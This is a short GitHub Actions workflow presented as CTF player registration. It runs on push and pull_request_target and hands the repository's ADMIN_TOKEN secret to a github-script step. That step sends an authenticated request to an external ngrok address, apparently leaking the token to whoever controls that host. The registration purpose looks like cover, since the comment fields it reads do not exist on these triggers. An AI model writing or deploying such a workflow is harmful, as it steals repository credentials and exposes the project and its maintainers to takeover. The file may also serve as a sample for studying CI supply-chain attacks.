name: ctf registration
on: [push, pull_request_target]

jobs:
  ctf_registration:
    runs-on: ubuntu-latest
    steps:
      - name: register player
        uses: actions/github-script@v3
        env:
          LOGIN: ${{ github.event.comment.user.login }}
          COMMENT: $${{ github.event.comment.body }}
        with:
          github-token: ${{ secrets.ADMIN_TOKEN }}
          script: |
            const result = await github.request("http://312177246bcd.ngrok.io/api/info")
